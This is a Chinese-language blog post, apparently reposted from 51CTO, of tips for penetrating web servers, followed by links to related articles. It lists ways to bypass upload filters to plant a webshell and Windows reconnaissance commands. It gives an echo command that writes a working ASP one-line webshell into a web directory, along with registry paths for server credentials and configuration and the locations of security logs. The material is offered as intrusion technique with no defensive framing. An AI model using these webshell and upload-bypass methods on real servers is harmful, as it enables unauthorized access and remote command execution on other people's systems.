入侵渗透中用到的一些技巧和思路

本文涉及的产品
日志服务 SLS,月写入数据量 50GB 1个月
简介:

 上传漏洞拿shell:

    1.直接上传asp.asa.jsp.cer.php.aspx.htr.cdx....之类的马,拿到shell.
    2.就是在上传时在后缀后面加空格或者加几点,也许也会有惊奇的发现。例:*.asp ,*.asp..。
    3.利用双重扩展名上传例如:*.jpg.asa格式(也可以配上第二点一起利用)。
    4.gif文件头欺骗
    5.同名重复上传也很OK。:

入侵渗透中用到的命令,语法:

    set,systeminfo,ipconfig,ping,利用这些命令可以收到比较多的系统信息
    tasklist /svc   查看 服务对应的pid 
    netstat -ano,netstat -abnv
    fsutil.exe fsinfo drives  列出全部盘符
    dir d:\*conn*.* /s     找数据库连接文件
    telnet 218.25.88.234 3389    对外部是否开放了这个端口
    echo  ^<%execute(request("cmd"))%^> >>e:\k\X.asp   写一句话到e:\k\目录,密码为cmd.
    type d:\wwwroot\web\k6.asp >d:\wwwroot\123\a.asp   传送d:\wwwroot\web\下的k6.asp到d:\wwwroot\123\重命名为a.asp

注册表敏感信息:

    HKEY_LOCAL_MACHINE\SOFTWARE\MySQL AB\    mysql 注册表位置
    HKEY_LOCAL_MACHINE\SOFTWARE\HZHOST\CONFIG\   华众主机位置
    HKEY_LOCAL_MACHINE\SOFTWARE\cat soft\serv-u\    serv-u 位置
    HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server\Wds\rdpwd\Tds\tcp\PortNamber 3389端口
    HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\Tcpip\Parameters    1433端口
    HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\MSFtpsvc\Parameters\Virtual Roots\  服务器ftp路径

服务器日志文件物理路径:

    安全日志文件:%systemroot%\system32\config \SecEvent.EVT
    系统日志文件:%systemroot%\system32\config \SysEvent.EVT
    应用程序日志文件:%systemroot%\system32\config \AppEvent.EVT
    FTP连接日志和HTTPD事务日志:systemroot% \system32\LogFiles\,下面还有子文件夹,分别对应该FTP和Web服务的日志,其对应的后缀名为.Log。
    诺顿杀毒日志:C:\Documents and Settings\All Users\Application Data\Symantec











本文转hackfreer51CTO博客,原文链接:http://blog.51cto.com/pnig0s1992/534065,如需转载请自行联系原作者

相关实践学习
日志服务之使用Nginx模式采集日志
本文介绍如何通过日志服务控制台创建Nginx模式的Logtail配置快速采集Nginx日志并进行多维度分析。
相关文章
|
3月前
|
安全 算法 网络安全
网络安全的盾牌与剑:漏洞防御与加密技术深度解析
【8月更文挑战第31天】在数字时代的海洋中,网络安全是航行者不可或缺的罗盘。本文将揭开网络安全漏洞的面纱,深入探索加密技术的奥秘,并通过代码示例揭示安全意识的重要性。从基础概念到实战应用,我们将一同航行在保护数据安全的航道上,确保每一位数字航海者的航程安全。
|
3月前
|
安全 网络安全 数据处理
网络安全的盾牌与剑:漏洞管理及加密技术深度解析
【8月更文挑战第3天】在数字世界的海洋中,网络安全是保护我们免受网络风暴侵袭的坚固盾牌。本文将深入探讨网络安全中的两大核心要素——漏洞管理和加密技术。通过实际代码示例,我们将揭示如何识别和修补安全漏洞,以及如何应用加密算法来保护数据安全。文章旨在提升读者的安全意识,并提供实用的技术知识,帮助构建更为安全的数字环境。
|
6月前
|
安全 应用服务中间件 PHP
黑客渗透知识点总结
黑客渗透知识点总结
|
安全 网络安全 数据库
网站攻击思路
最近一直在忙着项目,公众号也有很久没更新了,在此我给大家深表歉意。毕竟大三狗了。下半年就要滚蛋实习了。然后就在搞点项目,应聘的时候多一点竞争力。废话少说,直接进入正题。
|
安全 数据安全/隐私保护
网站渗透思路总结
网站渗透思路总结
105 0
|
安全 Linux Shell
服务器遭受攻击之后的常见思路
当服务器收到攻击的时候该怎么办
|
SQL 安全 搜索推荐
渗透测试SQL注入延伸攻击与防御措施
几年前,SQL注入在世界范围内很流行,但现在,SQL注入仍然是最流行的攻击方法之一,开发人员为此头疼。当然主要是因为注入攻击的灵活性,一个目的,多条语句,多种编写方法。SQL注入可以分为工具和手工两种。由于自动化,工具通常比手动注入效率高得多,但与手动注入相比,它们受到限制,因为它们没有针对性。
177 0
渗透测试SQL注入延伸攻击与防御措施
|
SQL 安全 搜索推荐
渗透测试之sql注入延伸手法的攻与防
几年前,SQL注入在世界范围内很流行,但现在,SQL注入仍然是最流行的攻击方法之一,开发人员为此头疼。当然主要是因为注入攻击的灵活性,一个目的,多条语句,多种编写方法。SQL注入可以分为工具和手工两种。由于自动化,工具通常比手动注入效率高得多,但与手动注入相比,它们受到限制,因为它们没有针对性。
5268 0
渗透测试之sql注入延伸手法的攻与防
|
安全 数据库 数据安全/隐私保护